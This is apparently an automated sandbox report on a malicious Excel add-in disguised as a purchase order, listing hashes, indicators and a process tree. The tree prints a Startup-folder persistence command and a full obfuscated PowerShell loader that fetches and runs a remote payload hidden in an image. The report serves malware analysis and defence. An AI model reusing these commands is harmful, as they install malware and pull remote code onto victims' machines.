Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
28/08/2023, 08:54
Static task
static1
Behavioral task
behavioral1
Sample
New Order PO2087441006AUGUST.xlam
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
New Order PO2087441006AUGUST.xlam
Resource
win10v2004-20230703-en
General
-
Target
New Order PO2087441006AUGUST.xlam
-
Size
715KB
-
MD5
34c74ed2300a242fb0c974a51c8c72e3
-
SHA1
5221f4f8f3d4c208cdba6933ed4eb9d6e6919021
-
SHA256
d4af8019f4fb6f832ad72af1304293684e5299a6f263228206efb74569d10e4b
-
SHA512
c6d32a3055abb916623c0d20e18453686b317da29a43a5e8a0b690eeb4b90274051f5bbd50ac05a9170770028f569a43e7d9ed904326b94476c67592ac60f2df
-
SSDEEP
12288:fu51V6q8xfTVjtiawK3VVOnjBmNB0d7UFBwYdG+IqK3uZuCnPO6rXL:fHZjUawOGgNBc7EW4GhqKj0PdXL
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855
https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 3016 EQNEDT32.EXE 7 476 powershell.exe 9 476 powershell.exe 11 476 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ dWi.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ dWi.vbs powershell.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 3016 EQNEDT32.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1232 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2124 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2840 powershell.exe 2540 powershell.exe 476 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2540 powershell.exe Token: SeDebugPrivilege 476 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2124 EXCEL.EXE 2124 EXCEL.EXE 2124 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 3016 wrote to memory of 2992 3016 EQNEDT32.EXE 29 PID 3016 wrote to memory of 2992 3016 EQNEDT32.EXE 29 PID 3016 wrote to memory of 2992 3016 EQNEDT32.EXE 29 PID 3016 wrote to memory of 2992 3016 EQNEDT32.EXE 29 PID 2992 wrote to memory of 2436 2992 WScript.exe 31 PID 2992 wrote to memory of 2436 2992 WScript.exe 31 PID 2992 wrote to memory of 2436 2992 WScript.exe 31 PID 2992 wrote to memory of 2436 2992 WScript.exe 31 PID 2436 wrote to memory of 1232 2436 cmd.exe 33 PID 2436 wrote to memory of 1232 2436 cmd.exe 33 PID 2436 wrote to memory of 1232 2436 cmd.exe 33 PID 2436 wrote to memory of 1232 2436 cmd.exe 33 PID 2436 wrote to memory of 2868 2436 cmd.exe 34 PID 2436 wrote to memory of 2868 2436 cmd.exe 34 PID 2436 wrote to memory of 2868 2436 cmd.exe 34 PID 2436 wrote to memory of 2868 2436 cmd.exe 34 PID 2868 wrote to memory of 2840 2868 cmd.exe 35 PID 2868 wrote to memory of 2840 2868 cmd.exe 35 PID 2868 wrote to memory of 2840 2868 cmd.exe 35 PID 2868 wrote to memory of 2840 2868 cmd.exe 35 PID 2992 wrote to memory of 2540 2992 WScript.exe 36 PID 2992 wrote to memory of 2540 2992 WScript.exe 36 PID 2992 wrote to memory of 2540 2992 WScript.exe 36 PID 2992 wrote to memory of 2540 2992 WScript.exe 36 PID 2540 wrote to memory of 476 2540 powershell.exe 38 PID 2540 wrote to memory of 476 2540 powershell.exe 38 PID 2540 wrote to memory of 476 2540 powershell.exe 38 PID 2540 wrote to memory of 476 2540 powershell.exe 38
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New Order PO2087441006AUGUST.xlam"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2124
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\etysvolp.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\etysvolp.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ dWi.vbs')"3⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 54⤵
- Runs ping.exe
PID:1232
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\etysvolp.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ dWi.vbs')"4⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\etysvolp.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ dWi.vbs')5⤵
- Drops startup file
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JChr(63)&Chr(63)BpChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBnChr(63)&Chr(63)GUChr(63)&Chr(63)VQByChr(63)&Chr(63)GwChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JwBoChr(63)&Chr(63)HQChr(63)&Chr(63)dChr(63)&Chr(63)BwChr(63)&Chr(63)HMChr(63)&Chr(63)OgChr(63)&Chr(63)vChr(63)&Chr(63)C8Chr(63)&Chr(63)dQBwChr(63)&Chr(63)GwChr(63)&Chr(63)bwBhChr(63)&Chr(63)GQChr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)GkChr(63)&Chr(63)bQBhChr(63)&Chr(63)GcChr(63)&Chr(63)ZQBuChr(63)&Chr(63)HMChr(63)&Chr(63)LgBjChr(63)&Chr(63)G8Chr(63)&Chr(63)bQChr(63)&Chr(63)uChr(63)&Chr(63)GIChr(63)&Chr(63)cgChr(63)&Chr(63)vChr(63)&Chr(63)GkChr(63)&Chr(63)bQBhChr(63)&Chr(63)GcChr(63)&Chr(63)ZQBzChr(63)&Chr(63)C8Chr(63)&Chr(63)MChr(63)&Chr(63)Chr(63)&Chr(63)wChr(63)&Chr(63)DQChr(63)&Chr(63)LwChr(63)&Chr(63)1Chr(63)&Chr(63)DYChr(63)&Chr(63)MwChr(63)&Chr(63)vChr(63)&Chr(63)DYChr(63)&Chr(63)MgChr(63)&Chr(63)xChr(63)&Chr(63)C8Chr(63)&Chr(63)bwByChr(63)&Chr(63)GkChr(63)&Chr(63)ZwBpChr(63)&Chr(63)G4Chr(63)&Chr(63)YQBsChr(63)&Chr(63)C8Chr(63)&Chr(63)dQBuChr(63)&Chr(63)GkChr(63)&Chr(63)dgBlChr(63)&Chr(63)HIChr(63)&Chr(63)cwBvChr(63)&Chr(63)F8Chr(63)&Chr(63)dgBiChr(63)&Chr(63)HMChr(63)&Chr(63)LgBqChr(63)&Chr(63)HChr(63)&Chr(63)Chr(63)&Chr(63)ZQBnChr(63)&Chr(63)D8Chr(63)&Chr(63)MQChr(63)&Chr(63)2Chr(63)&Chr(63)DkChr(63)&Chr(63)MChr(63)&Chr(63)Chr(63)&Chr(63)5Chr(63)&Chr(63)DMChr(63)&Chr(63)MQChr(63)&Chr(63)4Chr(63)&Chr(63)DUChr(63)&Chr(63)NQChr(63)&Chr(63)nChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)B3Chr(63)&Chr(63)GUChr(63)&Chr(63)YgBDChr(63)&Chr(63)GwChr(63)&Chr(63)aQBlChr(63)&Chr(63)G4Chr(63)&Chr(63)dChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)D0Chr(63)&Chr(63)IChr(63)&Chr(63)BOChr(63)&Chr(63)GUChr(63)&Chr(63)dwChr(63)&Chr(63)tChr(63)&Chr(63)E8Chr(63)&Chr(63)YgBqChr(63)&Chr(63)GUChr(63)&Chr(63)YwB0Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)UwB5Chr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BlChr(63)&Chr(63)G0Chr(63)&Chr(63)LgBOChr(63)&Chr(63)GUChr(63)&Chr(63)dChr(63)&Chr(63)Chr(63)&Chr(63)uChr(63)&Chr(63)FcChr(63)&Chr(63)ZQBiChr(63)&Chr(63)EMChr(63)&Chr(63)bChr(63)&Chr(63)BpChr(63)&Chr(63)GUChr(63)&Chr(63)bgB0Chr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BpChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBnChr(63)&Chr(63)GUChr(63)&Chr(63)QgB5Chr(63)&Chr(63)HQChr(63)&Chr(63)ZQBzChr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)CQChr(63)&Chr(63)dwBlChr(63)&Chr(63)GIChr(63)&Chr(63)QwBsChr(63)&Chr(63)GkChr(63)&Chr(63)ZQBuChr(63)&Chr(63)HQChr(63)&Chr(63)LgBEChr(63)&Chr(63)G8Chr(63)&Chr(63)dwBuChr(63)&Chr(63)GwChr(63)&Chr(63)bwBhChr(63)&Chr(63)GQChr(63)&Chr(63)RChr(63)&Chr(63)BhChr(63)&Chr(63)HQChr(63)&Chr(63)YQChr(63)&Chr(63)oChr(63)&Chr(63)CQChr(63)&Chr(63)aQBtChr(63)&Chr(63)GEChr(63)&Chr(63)ZwBlChr(63)&Chr(63)FUChr(63)&Chr(63)cgBsChr(63)&Chr(63)CkChr(63)&Chr(63)OwChr(63)&Chr(63)kChr(63)&Chr(63)GkChr(63)&Chr(63)bQBhChr(63)&Chr(63)GcChr(63)&Chr(63)ZQBUChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)B0Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)FsChr(63)&Chr(63)UwB5Chr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BlChr(63)&Chr(63)G0Chr(63)&Chr(63)LgBUChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)B0Chr(63)&Chr(63)C4Chr(63)&Chr(63)RQBuChr(63)&Chr(63)GMChr(63)&Chr(63)bwBkChr(63)&Chr(63)GkChr(63)&Chr(63)bgBnChr(63)&Chr(63)F0Chr(63)&Chr(63)OgChr(63)&Chr(63)6Chr(63)&Chr(63)FUChr(63)&Chr(63)VChr(63)&Chr(63)BGChr(63)&Chr(63)DgChr(63)&Chr(63)LgBHChr(63)&Chr(63)GUChr(63)&Chr(63)dChr(63)&Chr(63)BTChr(63)&Chr(63)HQChr(63)&Chr(63)cgBpChr(63)&Chr(63)G4Chr(63)&Chr(63)ZwChr(63)&Chr(63)oChr(63)&Chr(63)CQChr(63)&Chr(63)aQBtChr(63)&Chr(63)GEChr(63)&Chr(63)ZwBlChr(63)&Chr(63)EIChr(63)&Chr(63)eQB0Chr(63)&Chr(63)GUChr(63)&Chr(63)cwChr(63)&Chr(63)pChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)RgBsChr(63)&Chr(63)GEChr(63)&Chr(63)ZwChr(63)&Chr(63)gChr(63)&Chr(63)D0Chr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)nChr(63)&Chr(63)DwChr(63)&Chr(63)PChr(63)&Chr(63)BCChr(63)&Chr(63)EEChr(63)&Chr(63)UwBFChr(63)&Chr(63)DYChr(63)&Chr(63)NChr(63)&Chr(63)BfChr(63)&Chr(63)FMChr(63)&Chr(63)VChr(63)&Chr(63)BBChr(63)&Chr(63)FIChr(63)&Chr(63)VChr(63)&Chr(63)Chr(63)&Chr(63)+Chr(63)&Chr(63)D4Chr(63)&Chr(63)JwChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)ZQBuChr(63)&Chr(63)GQChr(63)&Chr(63)RgBsChr(63)&Chr(63)GEChr(63)&Chr(63)ZwChr(63)&Chr(63)gChr(63)&Chr(63)D0Chr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)nChr(63)&Chr(63)DwChr(63)&Chr(63)PChr(63)&Chr(63)BCChr(63)&Chr(63)EEChr(63)&Chr(63)UwBFChr(63)&Chr(63)DYChr(63)&Chr(63)NChr(63)&Chr(63)BfChr(63)&Chr(63)EUChr(63)&Chr(63)TgBEChr(63)&Chr(63)D4Chr(63)&Chr(63)PgChr(63)&Chr(63)nChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)SQBuChr(63)&Chr(63)GQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)CQChr(63)&Chr(63)aQBtChr(63)&Chr(63)GEChr(63)&Chr(63)ZwBlChr(63)&Chr(63)FQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)HQChr(63)&Chr(63)LgBJChr(63)&Chr(63)G4Chr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)TwBmChr(63)&Chr(63)CgChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)RgBsChr(63)&Chr(63)GEChr(63)&Chr(63)ZwChr(63)&Chr(63)pChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BlChr(63)&Chr(63)G4Chr(63)&Chr(63)ZChr(63)&Chr(63)BJChr(63)&Chr(63)G4Chr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BpChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBnChr(63)&Chr(63)GUChr(63)&Chr(63)VChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)dChr(63)&Chr(63)Chr(63)&Chr(63)uChr(63)&Chr(63)EkChr(63)&Chr(63)bgBkChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)BPChr(63)&Chr(63)GYChr(63)&Chr(63)KChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GUChr(63)&Chr(63)bgBkChr(63)&Chr(63)EYChr(63)&Chr(63)bChr(63)&Chr(63)BhChr(63)&Chr(63)GcChr(63)&Chr(63)KQChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)cwB0Chr(63)&Chr(63)GEChr(63)&Chr(63)cgB0Chr(63)&Chr(63)EkChr(63)&Chr(63)bgBkChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)C0Chr(63)&Chr(63)ZwBlChr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)MChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)C0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GUChr(63)&Chr(63)bgBkChr(63)&Chr(63)EkChr(63)&Chr(63)bgBkChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)C0Chr(63)&Chr(63)ZwB0Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)SQBuChr(63)&Chr(63)GQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)SQBuChr(63)&Chr(63)GQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)KwChr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)RgBsChr(63)&Chr(63)GEChr(63)&Chr(63)ZwChr(63)&Chr(63)uChr(63)&Chr(63)EwChr(63)&Chr(63)ZQBuChr(63)&Chr(63)GcChr(63)&Chr(63)dChr(63)&Chr(63)BoChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BiChr(63)&Chr(63)GEChr(63)&Chr(63)cwBlChr(63)&Chr(63)DYChr(63)&Chr(63)NChr(63)&Chr(63)BMChr(63)&Chr(63)GUChr(63)&Chr(63)bgBnChr(63)&Chr(63)HQChr(63)&Chr(63)aChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)D0Chr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GUChr(63)&Chr(63)bgBkChr(63)&Chr(63)EkChr(63)&Chr(63)bgBkChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)C0Chr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BhChr(63)&Chr(63)HIChr(63)&Chr(63)dChr(63)&Chr(63)BJChr(63)&Chr(63)G4Chr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)OwChr(63)&Chr(63)kChr(63)&Chr(63)GIChr(63)&Chr(63)YQBzChr(63)&Chr(63)GUChr(63)&Chr(63)NgChr(63)&Chr(63)0Chr(63)&Chr(63)EMChr(63)&Chr(63)bwBtChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BpChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBnChr(63)&Chr(63)GUChr(63)&Chr(63)VChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)dChr(63)&Chr(63)Chr(63)&Chr(63)uChr(63)&Chr(63)FMChr(63)&Chr(63)dQBiChr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)ByChr(63)&Chr(63)GkChr(63)&Chr(63)bgBnChr(63)&Chr(63)CgChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)SQBuChr(63)&Chr(63)GQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)CwChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GIChr(63)&Chr(63)YQBzChr(63)&Chr(63)GUChr(63)&Chr(63)NgChr(63)&Chr(63)0Chr(63)&Chr(63)EwChr(63)&Chr(63)ZQBuChr(63)&Chr(63)GcChr(63)&Chr(63)dChr(63)&Chr(63)BoChr(63)&Chr(63)CkChr(63)&Chr(63)OwChr(63)&Chr(63)kChr(63)&Chr(63)GMChr(63)&Chr(63)bwBtChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)QgB5Chr(63)&Chr(63)HQChr(63)&Chr(63)ZQBzChr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)FsChr(63)&Chr(63)UwB5Chr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BlChr(63)&Chr(63)G0Chr(63)&Chr(63)LgBDChr(63)&Chr(63)G8Chr(63)&Chr(63)bgB2Chr(63)&Chr(63)GUChr(63)&Chr(63)cgB0Chr(63)&Chr(63)F0Chr(63)&Chr(63)OgChr(63)&Chr(63)6Chr(63)&Chr(63)EYChr(63)&Chr(63)cgBvChr(63)&Chr(63)G0Chr(63)&Chr(63)QgBhChr(63)&Chr(63)HMChr(63)&Chr(63)ZQChr(63)&Chr(63)2Chr(63)&Chr(63)DQChr(63)&Chr(63)UwB0Chr(63)&Chr(63)HIChr(63)&Chr(63)aQBuChr(63)&Chr(63)GcChr(63)&Chr(63)KChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GIChr(63)&Chr(63)YQBzChr(63)&Chr(63)GUChr(63)&Chr(63)NgChr(63)&Chr(63)0Chr(63)&Chr(63)EMChr(63)&Chr(63)bwBtChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)KQChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)bChr(63)&Chr(63)BvChr(63)&Chr(63)GEChr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)GQChr(63)&Chr(63)QQBzChr(63)&Chr(63)HMChr(63)&Chr(63)ZQBtChr(63)&Chr(63)GIChr(63)&Chr(63)bChr(63)&Chr(63)B5Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)FsChr(63)&Chr(63)UwB5Chr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BlChr(63)&Chr(63)G0Chr(63)&Chr(63)LgBSChr(63)&Chr(63)GUChr(63)&Chr(63)ZgBsChr(63)&Chr(63)GUChr(63)&Chr(63)YwB0Chr(63)&Chr(63)GkChr(63)&Chr(63)bwBuChr(63)&Chr(63)C4Chr(63)&Chr(63)QQBzChr(63)&Chr(63)HMChr(63)&Chr(63)ZQBtChr(63)&Chr(63)GIChr(63)&Chr(63)bChr(63)&Chr(63)B5Chr(63)&Chr(63)F0Chr(63)&Chr(63)OgChr(63)&Chr(63)6Chr(63)&Chr(63)EwChr(63)&Chr(63)bwBhChr(63)&Chr(63)GQChr(63)&Chr(63)KChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GMChr(63)&Chr(63)bwBtChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)QgB5Chr(63)&Chr(63)HQChr(63)&Chr(63)ZQBzChr(63)&Chr(63)CkChr(63)&Chr(63)OwChr(63)&Chr(63)kChr(63)&Chr(63)HQChr(63)&Chr(63)eQBwChr(63)&Chr(63)GUChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BsChr(63)&Chr(63)G8Chr(63)&Chr(63)YQBkChr(63)&Chr(63)GUChr(63)&Chr(63)ZChr(63)&Chr(63)BBChr(63)&Chr(63)HMChr(63)&Chr(63)cwBlChr(63)&Chr(63)G0Chr(63)&Chr(63)YgBsChr(63)&Chr(63)HkChr(63)&Chr(63)LgBHChr(63)&Chr(63)GUChr(63)&Chr(63)dChr(63)&Chr(63)BUChr(63)&Chr(63)HkChr(63)&Chr(63)cChr(63)&Chr(63)BlChr(63)&Chr(63)CgChr(63)&Chr(63)JwBGChr(63)&Chr(63)GkChr(63)&Chr(63)YgBlChr(63)&Chr(63)HIChr(63)&Chr(63)LgBIChr(63)&Chr(63)G8Chr(63)&Chr(63)bQBlChr(63)&Chr(63)CcChr(63)&Chr(63)KQChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)bQBlChr(63)&Chr(63)HQChr(63)&Chr(63)aChr(63)&Chr(63)BvChr(63)&Chr(63)GQChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)B0Chr(63)&Chr(63)HkChr(63)&Chr(63)cChr(63)&Chr(63)BlChr(63)&Chr(63)C4Chr(63)&Chr(63)RwBlChr(63)&Chr(63)HQChr(63)&Chr(63)TQBlChr(63)&Chr(63)HQChr(63)&Chr(63)aChr(63)&Chr(63)BvChr(63)&Chr(63)GQChr(63)&Chr(63)KChr(63)&Chr(63)Chr(63)&Chr(63)nChr(63)&Chr(63)FYChr(63)&Chr(63)QQBJChr(63)&Chr(63)CcChr(63)&Chr(63)KQChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)YQByChr(63)&Chr(63)GcChr(63)&Chr(63)dQBtChr(63)&Chr(63)GUChr(63)&Chr(63)bgB0Chr(63)&Chr(63)HMChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)LChr(63)&Chr(63)Chr(63)&Chr(63)oChr(63)&Chr(63)CcChr(63)&Chr(63)dChr(63)&Chr(63)B4Chr(63)&Chr(63)HQChr(63)&Chr(63)LgBlChr(63)&Chr(63)GQChr(63)&Chr(63)bgChr(63)&Chr(63)vChr(63)&Chr(63)DgChr(63)&Chr(63)NChr(63)&Chr(63)Chr(63)&Chr(63)yChr(63)&Chr(63)C4Chr(63)&Chr(63)MQChr(63)&Chr(63)1Chr(63)&Chr(63)C4Chr(63)&Chr(63)NgChr(63)&Chr(63)3Chr(63)&Chr(63)C4Chr(63)&Chr(63)MChr(63)&Chr(63)Chr(63)&Chr(63)4Chr(63)&Chr(63)C8Chr(63)&Chr(63)LwChr(63)&Chr(63)6Chr(63)&Chr(63)HChr(63)&Chr(63)Chr(63)&Chr(63)dChr(63)&Chr(63)B0Chr(63)&Chr(63)GgChr(63)&Chr(63)JwChr(63)&Chr(63)pChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BtChr(63)&Chr(63)GUChr(63)&Chr(63)dChr(63)&Chr(63)BoChr(63)&Chr(63)G8Chr(63)&Chr(63)ZChr(63)&Chr(63)Chr(63)&Chr(63)uChr(63)&Chr(63)EkChr(63)&Chr(63)bgB2Chr(63)&Chr(63)G8Chr(63)&Chr(63)awBlChr(63)&Chr(63)CgChr(63)&Chr(63)JChr(63)&Chr(63)BuChr(63)&Chr(63)HUChr(63)&Chr(63)bChr(63)&Chr(63)BsChr(63)&Chr(63)CwChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GEChr(63)&Chr(63)cgBnChr(63)&Chr(63)HUChr(63)&Chr(63)bQBlChr(63)&Chr(63)G4Chr(63)&Chr(63)dChr(63)&Chr(63)BzChr(63)&Chr(63)CkChr(63)&Chr(63)';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('Chr(63)&Chr(63)','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
